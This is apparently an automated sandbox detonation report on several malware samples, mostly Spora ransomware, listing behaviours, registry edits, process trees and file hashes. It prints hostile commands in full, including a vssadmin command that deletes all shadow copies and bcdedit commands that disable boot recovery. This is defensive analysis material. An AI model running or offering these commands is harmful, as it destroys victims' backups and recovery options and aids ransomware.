Office loads VBA resources, possible macro or embedded object present

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Temp\~WRD0000.tmp\:Zone.Identifier:$DATA C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: RenamesItself

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Tuyen bo chung Viet Nam - Hoa Ky - Infected and EnCrypted.doc"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

N/A

Files

memory/1656-0-0x000000002FAC1000-0x000000002FAC2000-memory.dmp

memory/1656-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1656-2-0x000000007139D000-0x00000000713A8000-memory.dmp

memory/1656-5-0x0000000000780000-0x0000000000880000-memory.dmp

memory/1656-13-0x0000000000780000-0x0000000000880000-memory.dmp

memory/1656-14-0x0000000000780000-0x0000000000880000-memory.dmp

memory/1656-12-0x0000000000780000-0x0000000000880000-memory.dmp

memory/1656-11-0x0000000000780000-0x0000000000880000-memory.dmp

memory/1656-10-0x0000000000780000-0x0000000000880000-memory.dmp

memory/1656-9-0x0000000000780000-0x0000000000880000-memory.dmp

memory/1656-8-0x0000000000780000-0x0000000000880000-memory.dmp

memory/1656-7-0x0000000000780000-0x0000000000880000-memory.dmp

memory/1656-6-0x0000000000780000-0x0000000000880000-memory.dmp

memory/1656-4-0x0000000000780000-0x0000000000880000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\~WRD0000.tmp

MD5 fde0acfe142ea73559014871ed7b1b47
SHA1 27f2c34bbcb5611af68a0f143c6ee5766eabf121
SHA256 0c32e700da9a052196207dfd2796bd4bedcd1117a03699baae68ac2a3b7a609b
SHA512 9b01194b19072b1bb5e8df3f4fdfb942f9606b7a7c3b080016302419076a50192d42d58f274a18e437c21cfaae39622b83cbb132a332f3de622efa37ba542ba3

memory/1656-30-0x000000007139D000-0x00000000713A8000-memory.dmp

memory/1656-31-0x0000000000780000-0x0000000000880000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

118s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Uninstall.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Uninstall.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Uninstall.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Uninstall.exe

"C:\Users\Admin\AppData\Local\Temp\Uninstall.exe"

C:\Users\Admin\AppData\Local\Temp\Uninstall.exe

"C:\Users\Admin\AppData\Local\Temp\Uninstall.exe" end

Network

N/A

Files

memory/2644-0-0x0000000000400000-0x0000000000423000-memory.dmp

memory/2336-1-0x0000000000400000-0x0000000000423000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

187s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\spora.exe"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\USF50-62RZT-XTATX-HTOOT-ZYYYY.HTML C:\Users\Admin\AppData\Local\Temp\spora.exe N/A

Reads user/profile data of web browsers

spyware stealer

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2796 set thread context of 1540 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Users\Admin\AppData\Local\Temp\spora.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\spora.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\spora.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000078a0cc6b0b830b4fbbc12dd3fac6f54200000000020000000000106600000001000020000000ec75a2286dc7a24ff959658895e1214a1edbec120bff195b14223d649a3b6ebe000000000e80000000020000200000004fb84450943f52f2b667438e3b35e737e30e9f272e3bf201815f107f3677ae5e20000000bef170c7a7203dd52f23b156f767e62891994ac34c193bde396e011c48843580400000002c90e763d69447c3d4838dd6b5662d9134270c8160648f7f769dfbb9c6858d3d382bd063e41c30f107fc971e99141307445118ffb6f65012ac7fcbc06360fdbd C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{68667531-A883-11EF-A5D8-F2DF7204BD4F} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "438408649" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50b0273d903cdb01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000078a0cc6b0b830b4fbbc12dd3fac6f542000000000200000000001066000000010000200000005be205dabb56b8b3c5179a1596016013c4af9446123505c6f34a8802f8187e8c000000000e8000000002000020000000402ed1ad6795914312986358fd6117bee19875c52d9de4903c06f0b5ec7475d5900000007678c27a81f9ad8a3be5a943863119494e3123dec45eba84b6fb1b7de647c5103ec9fec51f94b40f85077c127cc2f185405683a8b062ab6238e83fc96161a719019500955b0b826323f3b49dd0c0e8d638eb8118b1c0a51da1e0fd4183e7e4390af48ac1e177ed057716a77e1240e23ce552b44126a20fd1fafd8bdd6e56fc62148b0c51aa962ada0ec7e10e97c888b140000000ddff07d6a2ce7dad5e3364fa1493b44c600b1bda4928394d98bbfe8185c5b95abe431d5da8ccff86ce138f7c8411b5367a2249377ac1806dcae65181ba79a5f8 C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\spora.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2796 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Users\Admin\AppData\Local\Temp\spora.exe
PID 2796 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Users\Admin\AppData\Local\Temp\spora.exe
PID 2796 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Users\Admin\AppData\Local\Temp\spora.exe
PID 2796 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Users\Admin\AppData\Local\Temp\spora.exe
PID 2796 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Users\Admin\AppData\Local\Temp\spora.exe
PID 2796 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Users\Admin\AppData\Local\Temp\spora.exe
PID 2796 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Users\Admin\AppData\Local\Temp\spora.exe
PID 2796 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Users\Admin\AppData\Local\Temp\spora.exe
PID 2796 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Users\Admin\AppData\Local\Temp\spora.exe
PID 2796 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Users\Admin\AppData\Local\Temp\spora.exe
PID 2796 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Users\Admin\AppData\Local\Temp\spora.exe
PID 1540 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1540 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1540 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1540 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1540 wrote to memory of 692 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 1540 wrote to memory of 692 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 1540 wrote to memory of 692 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 1540 wrote to memory of 692 N/A C:\Users\Admin\AppData\Local\Temp\spora.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 692 wrote to memory of 1888 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 692 wrote to memory of 1888 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 692 wrote to memory of 1888 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 692 wrote to memory of 1888 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 552 wrote to memory of 1808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 552 wrote to memory of 1808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 552 wrote to memory of 1808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 552 wrote to memory of 932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 552 wrote to memory of 932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 552 wrote to memory of 932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 552 wrote to memory of 2252 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 552 wrote to memory of 2252 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 552 wrote to memory of 2252 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\spora.exe

"C:\Users\Admin\AppData\Local\Temp\spora.exe"

C:\Users\Admin\AppData\Local\Temp\spora.exe

C:\Users\Admin\AppData\Local\Temp\spora.exe

C:\Windows\SysWOW64\wbem\WMIC.exe

"C:\Windows\System32\wbem\WMIC.exe" process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\USF50-62RZT-XTATX-HTOOT-ZYYYY.HTML

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:692 CREDAT:275457 /prefetch:2

C:\Windows\system32\cmd.exe

cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

memory/1540-1-0x0000000000300000-0x0000000000400000-memory.dmp

memory/1540-4-0x0000000000400000-0x0000000000784000-memory.dmp

memory/1540-3-0x0000000000400000-0x0000000000784000-memory.dmp

memory/1540-13-0x0000000000400000-0x0000000000784000-memory.dmp

memory/1540-10-0x0000000000400000-0x0000000000784000-memory.dmp

memory/1540-8-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1540-7-0x0000000000400000-0x0000000000784000-memory.dmp

memory/1540-6-0x0000000000400000-0x0000000000784000-memory.dmp

memory/1540-5-0x0000000000400000-0x0000000000784000-memory.dmp

memory/2796-0-0x00000000002B0000-0x00000000002B5000-memory.dmp

memory/1540-12-0x0000000000400000-0x0000000000784000-memory.dmp

C:\Users\Admin\AppData\Roaming\USF50-62RZT-XTATX-HTOOT-ZYYYY.KEY

MD5 61abff02832b67d275b10e21909146ff
SHA1 6394ad02c77c02c3168be8c3a0b81d2fb8062898
SHA256 3ed7b10a126d8144bb966958d98a23bf727e92138a48456e7381b44c4f77759b
SHA512 43095a9b0fe2adff81f9c77dc8fbf2c7a4ab28ae1e01a9da2bd0e0cb3c029a3c336ea3543275c288db30ddc64896fc6a133c21a848de3e79b43d88e2fd60e6ff

F:\USF50-62RZT-XTATX-HTOOT-ZYYYY.HTML

MD5 d98f12ec6e0ef7f3117471ba9712a5f1
SHA1 1771a2bb43ce9b4421a8b643f5c3036e920853b0
SHA256 da4343509481acbb5805078da4f397ed35332d95041ca166f77ca8e0d2f21434
SHA512 cf4c5079d0288f7ad7f7b93d06884a36932b2b80f6955a749eda716596aee2b66c6d8154aa9b02e365e6ce2c047a47ab18c6c468279f2f810a0eafcb25316205

F:\USF50-62RZT-XTATX-HTOOT-ZYYYY.LST

MD5 f693ab1fdb0feb2d24976b12fb3e3196
SHA1 eb6a62e6e99c6b6005c45cf6a7f202818d35e5fd
SHA256 c6dfb028f50623f5cdbec757f0c27cf04fef3690db93fabf714b6c573ccf49c2
SHA512 2795161e37a9a3479ee1b849c020afab2f12ae2bf8040b1ad7bd9e8069817772b7b918bfca685096a74676ac7ca0ce7a257b04e879406d99f64d5b2404fc3324

memory/1540-121-0x0000000000400000-0x0000000000784000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab2A4D.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar2ABE.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8481b71d61faa011ac20489911dba498
SHA1 53f0925782f0af815a3125a42a109c092fe2e333
SHA256 325029b1e2a7a610cde9f47d26354b46b907d24acc4e90f6b67c2e1b7d04b2d2
SHA512 00003a09f5a1494d7b0ce4d7de454f09e1c28cea7a38b1f11f76875005c1349a7f13e1068343482e8e4bcd7d02da4b327c18fd360116c19e979395fe179aaae6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d0422a0fb0856c56d4e3fd14bef61235
SHA1 d425e77b5a075635d90ee391dcce6f04327cc723
SHA256 a17fca09172603d0242bf08039a872613c25abe19d3b33616141880723e4c3a5
SHA512 55d4d57dfa0274fb4ab49ea2df11570fcc5e716a6a5390ce5f38e0ad30da974ba7e7b17b2fa9b82b7dc7ec9bffcf34483fa29590d249a8468f0ff30e7da39028

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 018c34f0cb92c9453571183adbc0d83d
SHA1 675ad7ba77992a00b72a8ee018ea6727c953b252
SHA256 a2fa0f66e7db180f62d8289322803b58ac96eae1536fa101540ea47612814bc0
SHA512 90b0e2b3ea731de6271315a6e43e353a2912d34f12badf501eedda1cf386313d4a69dc0457476e2e2103c95943b1f2f88bee006e721f437da6dcce7b2c115597

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b5e7e8d76341d23d0111070871a29cb5
SHA1 1b8b335d00bcf36f776f14b977fca4a0e74fc210
SHA256 2ff7e7e591813b1d7e7c3d06cdfd2aa2d9a829e71a6ba44d67b864339a2b85b7
SHA512 1a354dcb59f754a7a11b8b7e62ce7a385931b66d484a16cbfd22fcfda28992ea83a985e3cdb050d544d301101ca7873bccc77eda553f3b13062d35e85536eade

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dfff273ca3a765bcbd1407fcd2810b2f
SHA1 0cbac3cc022b932592e975e8592f2adb540ec82b
